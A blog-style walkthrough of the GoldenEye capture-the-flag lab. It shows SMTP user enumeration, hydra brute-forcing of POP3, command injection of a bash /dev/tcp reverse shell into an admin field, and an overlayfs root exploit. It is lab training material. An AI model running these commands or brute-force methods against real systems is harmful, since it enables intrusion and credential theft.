Vulnhub is such a great resource for vulnerable virtual machines. Sometimes it can be hit or miss with the realism. At times it’s even laughable that the creator thought you’d find a certain flag.
I’m so happy to say, that the person that created the GoldenEye box (@_creosote)did not disappoint. If you’re a fan of the original 90’s James Bond flick GoldenEye, then this machine is going to be a nostalgia bomb as well as a fun challenge.
Defining the Attack Surface
nmap 192.168.56.101 -sC -sV -p- -oN full_nmap_scan
Starting out with our full port scan -p-, script scan -sC, and version -sV. This reveals a few services running.
It looks like the SMTP server has some commands that it’ll accept. We might use that to brute force some usernames. I like to find the low hanging fruit first though so I start with the webserver
Okay sweet initial landing page. Let’s follow the navigation instructions
Looks like we found a login. No creds yet though.
A good rule of thumb is to always look at the source of these pages. You never know what’s hiding in them.
Case in point, if you look at
terminal.js which is linked in the homepage, you find some custom JS that was written to drive that sweet landing page
If you read the comments, it says
Boris, make sure you update your default password. My sources say MI6 maybe planning to infiltrate. Be on the lookout for any suspicious network traffic... I encoded you p@ssword below ...
When I run use Burp Decoder to decode that password we get the password
From this we can probably safely assume the username is
So I go back to the login page and try out the creds
Interesting, it looks like they’re pointing us at the Pop3 servers next
Finding Credentials and Users
Something fun I think might work on this server, is brute forcing the users. I’m not sure if this was cheating or not, but I used a tool called
cewl to generate a massive wordlist. It’s great for brute forcing things that you believe are contextual. Since this box is all about the movie GoldenEye I decided to run cewl over the GoldenEye script to create a wordlist that’s contextual to the movie lol
The way we’re going to brute force the users is by abusing the SMTP server that’s running. By inspecting our NMAP output we can see that this server allows you to run the VRFY command. This command can be used to brute force usernames out of the system.
You can also do this attack by hand but it takes a little longer. We’ll see an example of this later on but for now we’re going to use the tool
smtp-user-enum and give it our wordlist as well as our target
Sure enough we end up finding two users
NATALYA. We know Boris is valid for user login on the webpage, but now it appears it’s also a unix user.
You can use netcat to log into POP3 servers.
First I tried logging into the POP3 server with the user credentials we know,
boris:InvincibleHack3r but they don’t seem to work. So it looks like the user credentials must be different. Thankfully we can use hydra to try and brute force the pop3 server
Using Hydra we were able to not only brute force the credentials
boris:secret1! but also
Let’s try and log into the POP3 server again
Sure enough we get in!
I had to look up some documentation to understand the commands I needed to use here to retrieve emails but essentially here they are
USER <username> <~ Sets username
PASS <password> <~ Sets password
STAT <~ Tells you how many messages are available
LIST <~ Tells you the message id and I believe the length
RERT <ID> <~ Retrieves the message and displays it in the console
Here’s the other two emails I retrieved
Okay not a ton that’s useful there other than some great movie references
Let’s look at Natalya’s emails
First email doesn’t have much in it helpful but it does help us understand that she has GNO privileges for some system when students are assigned
Ahhhh here we go, some new creds and a link. It looks like there’s a hostname we need to add to our
After we save that file, we can navigate to that url
Let’s try logging in with Xenia’s credentials
After navigating through the site a little, I came across this file upload and got stuck here _FOR A WHILE_
Pretty sure this is not the spot for access lol
Little more digging and I found this email from Dr Doak
My email username is doak
Well that can’t get much more clear lol
Just to be thorough though, let’s try and use the same SMTP VRFY function
It does appear that doak is a user on the system. Let’s see if we can brute force his credentials too with Hydra like we did Natalya and Boris
SWEET! We got another set of creds
doak:goat The GOAT rightfully so.
(Fun fact: Research who Doak is in the movie as well as who he is in real life)
Finding Admin Credentials
Alright, now we can log back into the mail server and see if Doak has anything juicy in his inbox
Okay, it looks like Dr Doak is speaking directly to us now and giving us his credentials to get into his account on the training site. If he’s the admin, we may be able to do more than just read posts.
We’re in! And we have a flag 🙂 Though it doesn’t appear Doak is an admin 🙁
Ohhh interesting, so we’re one step away from admin creds I guess.
Let’s check out that image
So I was hoping for a little more of a challenge here. The first thing I did with this image was try to run binwalk over it. I guess I was expecting some nested files. That didn’t turn anything up though. Next I ran strings over it
Looks like there’s some message in the exif data, so we can also run the
exif tool over the image to retrieve that
It appears in the image description there’s a base64 encoded string. When we decode this string in burp decoder we get
Now that we have what I believe is the admin password for the training site, let’s try logging out of the site, and logging back in with
Getting a Shell
I’ll admit that it took me a little bit to get this shell to work. I found the vulnerability immediately after logging in but for some reason it didn’t work for me.
As you make your way through the admin settings this input pops up under System Paths and it’s extraordinarily tempting looking. It’s clearly running some bash command. Sooooo, why not put our own bash command in? 🙂
Pulling from my favorite FAVORITE resource Reverse Shell Cheat Sheet by PenttestMonkey
I enter into that highlighted field the command
/bin/bash -i >& /dev/tcp/192.168.158.1/443 0>&1
Then on my attacking machine I run
nc -lvp 443 which opens a listener up on port 443
This is where I got hung up. The way I believe this was supposed to work was put in your command, and then go to make a post. When you make a post run the spell check on your post and it should run this command here. What actually happened was nothing for me haha
I ended up getting it to work by going into the settings and toggling the spell checker service. Once again I’m not sure if this was an intentional step or not.
Once you do this, you go back to the blog post and once again attempt to run the spell checker. If you do this, your shell code will execute
Getting a Root Shell
I waste no time when I’m trying to elevate privileges. I pull down the script
linenum.sh which you can find and more over on my favorite resources page
This had a ton of great info but ultimately it didn’t lead me to the root priv esc
To find that, I had to run the
Linux Privilege Escalation Auditing Tool which you can find here linux-exploit-suggester.sh
Once you run this tool you’ll see that the machine is vulnerable to something called an overlayfs attack. This exploit can be found already installed on your attacking machine if you have exploitdb installed
You just need to run
To which you will find a few candidates
Now, if you do what I did, you’ll get this c file over to the target machine, and attempt to compile it with gcc…. then you’ll realize there is no gcc
After some digging I came across something installed though called
cc which is the c compiler on the machine
So, naturally I compiled it and attempted to run it…. Then it blew up and complained about gcc again.
You’ll need to open this file up on your attacking machine and modify some of the code
As you can see here, inside the code, it’s attempting to compile something with gcc. Which, of course now we know doesn’t exist on the machine. Just give it `cc` instead and you’ll be good to go.
Send that sucker back to your target machine again, recompile it and run it
AND WE ARE ROOT!
I can’t overstate how much fun this machine was considering how big of a part GoldenEye played in my childhood. Every inch of this machine was crawling with nostalgic references. I loved every bit of it. Also, there wasn’t anything too crazy on here. For the most part the exploits were poor configurations and bad password management which we know happens in the real world.
In closing, if you’re a Goldeneye fanboi or fangirl, go check this box out. It’s a great time